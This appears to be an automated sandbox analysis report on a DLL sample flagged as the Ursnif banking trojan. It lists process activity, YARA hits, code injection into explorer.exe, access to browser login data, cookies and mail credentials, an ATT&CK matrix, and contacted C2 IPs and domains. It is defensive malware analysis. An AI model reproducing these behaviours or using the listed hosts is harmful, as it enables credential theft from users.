                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: explorer.exe, 0000001B.00000000.442375822.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.410845444.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.424824730.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.403709757.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.402601192.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D3365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D41FA HeapFree,GetSystemTimeAsFileTime,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D6D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		11
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		3
                      Credential API Hooking                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		4
                      Rootkit                      		Security Account Manager4
                      File and Directory Discovery                      		SMB/Windows Admin Shares11
                      Email Collection                      		Automated Exfiltration3
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Masquerading                      		NTDS27
                      System Information Discovery                      		Distributed Component Object Model3
                      Credential API Hooking                      		Scheduled Transfer13
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Valid Accounts                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Access Token Manipulation                      		Cached Domain Credentials111
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                      Virtualization/Sandbox Evasion                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job813
                      Process Injection                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Rundll32                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging3
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 620323 Sample: 2oCOO5LbPu.dll Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 72 8.8.8.8.in-addr.arpa 2->72 74 1.0.0.127.in-addr.arpa 2->74 108 Snort IDS alert for network traffic 2->108 110 Found malware configuration 2->110 112 Malicious sample detected (through community Yara rule) 2->112 114 9 other signatures 2->114 12 loaddll32.exe 1 2->12         started        14 mshta.exe 19 2->14         started        signatures3 process4 process5 16 cmd.exe 1 12->16         started        18 powershell.exe 32 14->18         started        signatures6 21 rundll32.exe 1 6 16->21         started        100 Injects code into the Windows Explorer (explorer.exe) 18->100 102 Writes to foreign memory regions 18->102 104 Modifies the context of a thread in another process (thread injection) 18->104 106 2 other signatures 18->106 25 csc.exe 3 18->25         started        28 csc.exe 3 18->28         started        30 conhost.exe 18->30         started        process7 dnsIp8 76 185.189.151.28, 49761, 80 AS-SOFTPLUSCH Switzerland 21->76 116 System process connects to network (likely due to code injection or exploit) 21->116 118 Writes to foreign memory regions 21->118 120 Allocates memory in foreign processes 21->120 122 3 other signatures 21->122 32 control.exe 1 21->32         started        68 C:\Users\user\AppData\Local\...\dyznokx3.dll, PE32 25->68 dropped 35 cvtres.exe 25->35         started        70 C:\Users\user\AppData\Local\...\ykprd3xj.dll, PE32 28->70 dropped 37 cvtres.exe 1 28->37         started        file9 signatures10 process11 signatures12 92 Changes memory attributes in foreign processes to executable or writable 32->92 94 Injects code into the Windows Explorer (explorer.exe) 32->94 96 Writes to foreign memory regions 32->96 98 4 other signatures 32->98 39 explorer.exe 32->39 injected 43 rundll32.exe 32->43         started        process13 dnsIp14 86 193.56.146.127, 49823, 80 LVLT-10753US unknown 39->86 88 cabrioxmdes.at 116.121.62.237, 49825, 49836, 49845 CJNET-ASCheiljedangCoIncKR Korea Republic of 39->88 90 gamexperts.net 39->90 124 System process connects to network (likely due to code injection or exploit) 39->124 126 Tries to steal Mail credentials (via file / registry access) 39->126 128 Changes memory attributes in foreign processes to executable or writable 39->128 130 8 other signatures 39->130 45 cmd.exe 39->45         started        48 cmd.exe 39->48         started        50 cmd.exe 39->50         started        52 4 other processes 39->52 signatures15 process16 signatures17 134 Uses ping.exe to sleep 45->134 136 Uses ping.exe to check the status of other devices and networks 45->136 138 Uses nslookup.exe to query domains 45->138 54 PING.EXE 45->54         started        57 conhost.exe 45->57         started        59 nslookup.exe 48->59         started        62 conhost.exe 48->62         started        64 conhost.exe 50->64         started        66 conhost.exe 52->66         started        process18 dnsIp19 78 192.168.2.1 unknown unknown 54->78 80 222.222.67.208.in-addr.arpa 59->80 82 resolver1.opendns.com 59->82 84 myip.opendns.com 59->84 132 May check the online IP address of the machine 59->132 signatures20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      2oCOO5LbPu.dll50%ReversingLabsWin32.Trojan.Zenpak
                      2oCOO5LbPu.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.36d0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

